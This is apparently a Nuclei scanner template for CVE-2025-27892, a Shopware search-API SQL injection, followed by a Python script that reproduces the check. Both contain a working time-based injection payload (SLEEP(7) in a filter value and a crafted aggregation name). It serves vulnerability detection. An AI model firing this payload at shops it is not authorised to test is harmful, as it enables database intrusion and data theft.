id: CVE-2025-27892

info:
  name: Shopware < 6.5.8.13 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the "aggregations" object. The name field of a nested aggregation inside this "aggregations" object is vulnerable to SQL injection, and attacker-controlled SQL can be supplied through that parameter.
  impact: |
    Authenticated attackers can execute arbitrary SQL queries through the aggregations parameter in the search API, potentially extracting sensitive data from the Shopware database.
  remediation: |
    Upgrade to Shopware version 6.5.8.13 or later, which properly sanitizes the aggregations parameter.
  reference:
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2025-001/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-27892
  classification:
    epss-score: 0.01246
    epss-percentile: 0.79619
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 6.8
    cve-id: CVE-2025-27892
    cwe-id: CWE-89
  metadata:
    max-request: 1
    vendor: shopware
    product: shopware
    verified: true
  tags: cve,cve2025,shopware,sqli,time-based-sqli,vuln

variables:
  token: "{{token}}"

http:
  - raw:
      - |
        @timeout: 30s
        POST /api/search/order HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
        Accept: */*
        Authorization: Bearer {{token}}
        Content-type: application/json

        {
          "filter": [
            {
              "type": "equals",
              "field": "transactions.stateMachineState.technicalName",
              "value": "paid` FROM `order`; SELECT SLEEP(7); -- "
            }
          ],
          "aggregations": [
            {
              "type": "histogram",
              "name": "order_sum_bucket",
              "field": "orderDateTime",
              "interval": "day",
              "aggregation": {
                "type": "sum",
                "name": "totalAmount ? ? \n--",
                "field": "amountTotal"
              }
            }
          ]
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Warning: Undefined array")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 500'
          - 'duration>=5'
        condition: and
# digest: 4a0a00473045022100eaac329f54d102825c051ed31521ec54f6683b720481c6b29ff13e540bde660e022076b721b75c4b7e5074a699d75567c7624a651a546e8003af4ed8d0b3a2b016a3:922c64590222798bb761d5b6d8e72950
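The same time-based check re-implemented outside Nuclei, added here as an example; it is not part of the template above and not Shopware code. It assumes a base URL of the Shopware instance, a bearer token for the Admin API, and a file holding the JSON request body copied from the raw request above. The function, file and argument names (`send_probe`, `matches`, `check`, `body.json`) are my own and not from the template or the advisory.

```python
"""Stand-alone reproduction of the template's time-based SQLi check.

Added example: mirrors the request and the four AND-ed matcher conditions of
the Nuclei template so the probe can be run and inspected without Nuclei.
"""
import json
import sys
import time
import urllib.error
import urllib.request

# Thresholds copied from the template: the payload sleeps for 7 s and the
# DSL matcher requires duration >= 5 s, leaving headroom for network jitter.
MIN_DELAY_SECONDS = 5.0
REQUEST_TIMEOUT = 30.0  # mirrors "@timeout: 30s"


def matches(status_code, content_type, body, duration):
    """Mirror the template's four AND-ed DSL conditions on one response.

    The delay alone is a weak signal; the 500 plus the PHP warning text in a
    JSON body is what separates the injection from an unrelated slow request.
    """
    return (
        "Warning: Undefined array" in body
        and "application/json" in content_type
        and status_code == 500
        and duration >= MIN_DELAY_SECONDS
    )


def send_probe(base_url, token, payload, timeout=REQUEST_TIMEOUT):
    """POST the search payload; return (status, content_type, body, seconds).

    urllib raises HTTPError for 4xx/5xx, but the expected signal here *is* a
    500 whose body carries the warning, so the error branch reads the body
    instead of discarding it. json.dumps re-escapes any newline in the
    aggregation name, so the body stays valid JSON on the wire.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + "/api/search/order",
        data=json.dumps(payload).encode("utf-8"),
        method="POST",
        headers={
            "Authorization": "Bearer " + token,
            "Content-Type": "application/json",
            "Accept": "*/*",
        },
    )
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.status
            content_type = resp.headers.get("Content-Type", "")
            body = resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        status = err.code
        content_type = err.headers.get("Content-Type", "")
        body = err.read().decode("utf-8", errors="replace")
    return status, content_type, body, time.monotonic() - start


def check(base_url, token, payload):
    """Run the probe once and evaluate it; returns (matched, raw_result)."""
    result = send_probe(base_url, token, payload)
    return matches(*result), result


if __name__ == "__main__":
    # Usage: python3 probe.py https://shop.example <bearer-token> body.json
    # body.json holds the JSON request body copied from the template above
    # (hypothetical file name chosen for this example).
    url, bearer, body_file = sys.argv[1:4]
    with open(body_file, encoding="utf-8") as fh:
        matched, (code, ctype, text, secs) = check(url, bearer, json.load(fh))
    print("match" if matched else "no match", code, ctype, round(secs, 2))
```

Run it with a token issued to a throwaway integration that has only the scope you are authorised to test with, and repeat a positive hit once: a single slow 500 can come from an overloaded instance, whereas a consistent delay of roughly the `SLEEP(7)` value together with the warning text is the behaviour the template keys on.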